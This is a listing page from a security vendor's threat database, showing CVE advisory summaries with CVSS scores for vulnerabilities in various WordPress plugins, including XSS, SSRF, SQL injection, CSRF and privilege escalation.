Calgary, Alberta, Canada
sales@hackhalt.com
Free Download Free Download Free Download
Explore Pricing Explore Pricing Explore Pricing

Blog

"Prevention is cheaper than a breach"

Live Vulnerability Intelligence

Threat Database

Search CVEs, inspect descriptions, and open detail pages with AI-assisted technical context.

Total3,046
Critical0
High3,046
Medium0
Reset
Showing 2401-2420 of 3046 records
Threat Entry Updated 2024-11-21

CVE-2023-3136 - Mailarchiver Plugin

The MailArchiver plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an email subject in versions up to, and including, 2.10.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

PLUGIN Mailarchiver

CVE-2023-3136

HIGH CVSS 7.2 2023-08-30
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2023-32499 - Radio Station Plugin

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Tony Zeoli, Tony Hayes Radio Station by netmix® – Manage and play your Show Schedule in WordPress! plugin

PLUGIN Radio Station

CVE-2023-32499

HIGH CVSS 7.1 2023-08-23
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2023-1977 - Booking Manager Plugin

The Booking Manager WordPress plugin before 2.0.29 does not validate URLs input in it's admin panel or in shortcodes for showing events from a remote .ics file, allowing an attacker with privileges as low as Subscriber to perform SSRF attacks on the sites internal network.

PLUGIN Booking Manager

CVE-2023-1977

HIGH CVSS 8.8 2023-08-16
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2023-0579 - Before 5 Plugin

The YARPP WordPress plugin before 5.30.3 does not validate and escape some of its shortcode attributes before using them in SQL statement/s, which could allow any authenticated users, such as subscribers to perform SQL Injection attacks.

PLUGIN Before 5

CVE-2023-0579

HIGH CVSS 8.8 2023-08-16
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2023-3958 - Wp Remote Users Sync Plugin

The WP Remote Users Sync plugin for WordPress is vulnerable to Server Side Request Forgery via the 'notify_ping_remote' AJAX function in versions up to, and including, 1.2.12. This can allow authenticated attackers with subscriber-level permissions or above to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. This was partially patched in version 1.2.12 and fully patched in version 1.2.13.

PLUGIN Wp Remote Users Sync

CVE-2023-3958

HIGH CVSS 8.5 2023-08-16
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2023-2916 - Infinitewp Client Plugin

The InfiniteWP Client plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.11.1 via the 'admin_notice' function. This can allow authenticated attackers with subscriber-level permissions or above to extract sensitive data including configuration. It can only be exploited if the plugin has not been configured yet. If combined with another arbitrary plugin installation and activation vulnerability, it may be possible to connect a site to InfiniteWP which would make remote management possible and allow for elevation of privileges.

PLUGIN Infinitewp Client

CVE-2023-2916

HIGH CVSS 7.5 2023-08-15
Open Full Technical Breakdown
Threat Entry Updated 2025-02-11

CVE-2023-4308 - User Submitted Posts Plugin

The User Submitted Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘user-submitted-content’ parameter in versions up to, and including, 20230809 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

PLUGIN User Submitted Posts

CVE-2023-4308

HIGH CVSS 7.2 2023-08-15
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2023-4293 - Premium Packages Sell Digital Products Securely Plugin

The Premium Packages - Sell Digital Products Securely plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.7.4 due to insufficient restriction on the 'wpdmpp_update_profile' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'profile[role]' parameter during a profile update.

PLUGIN Premium Packages Sell Digital Products Securely

CVE-2023-4293

HIGH CVSS 8.8 2023-08-12
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2023-4277 - Realia Plugin

The Realia plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.4.0. This is due to missing nonce validation on the 'process_change_profile_form' function. This makes it possible for unauthenticated attackers to change user email via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

PLUGIN Realia

CVE-2023-4277

HIGH CVSS 8.8 2023-08-10
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2023-4276 - Absolute Privacy Plugin

The Absolute Privacy plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.1. This is due to missing nonce validation on the 'abpr_profileShortcode' function. This makes it possible for unauthenticated attackers to change user email and password via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

PLUGIN Absolute Privacy

CVE-2023-4276

HIGH CVSS 8.8 2023-08-10
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2023-4243 - Full Customer Plugin

The FULL - Customer plugin for WordPress is vulnerable to Arbitrary File Upload via the /install-plugin REST route in versions up to, and including, 2.2.3 due to improper authorization. This allows authenticated attackers with subscriber-level permissions and above to execute code by installing plugins from arbitrary remote locations including non-repository sources onto the site, granted they are packaged as a valid WordPress plugin.

PLUGIN Full Customer

CVE-2023-4243

HIGH CVSS 8.8 2023-08-09
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2023-4239 - Real Estate Manager Plugin

The Real Estate Manager plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 6.7.1 due to insufficient restriction on the 'rem_save_profile_front' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wp_capabilities' parameter during a profile update.

PLUGIN Real Estate Manager

CVE-2023-4239

HIGH CVSS 8.8 2023-08-09
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2023-2843 - Multiparcels Shipping For Woocommerce Plugin

The MultiParcels Shipping For WooCommerce WordPress plugin before 1.14.15 does not properly sanitize and escape a parameter before using it in an SQL statement, which could allow any authenticated users, such as subscribers, to perform SQL Injection attacks.

PLUGIN Multiparcels Shipping For Woocommerce

CVE-2023-2843

HIGH CVSS 8.8 2023-08-07
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2021-24916 - Before 1 Plugin

The Qubely WordPress plugin before 1.8.6 allows unauthenticated user to send arbitrary e-mails to arbitrary addresses via the qubely_send_form_data AJAX action.

PLUGIN Before 1

CVE-2021-24916

HIGH CVSS 7.5 2023-08-07
Open Full Technical Breakdown
Scroll to top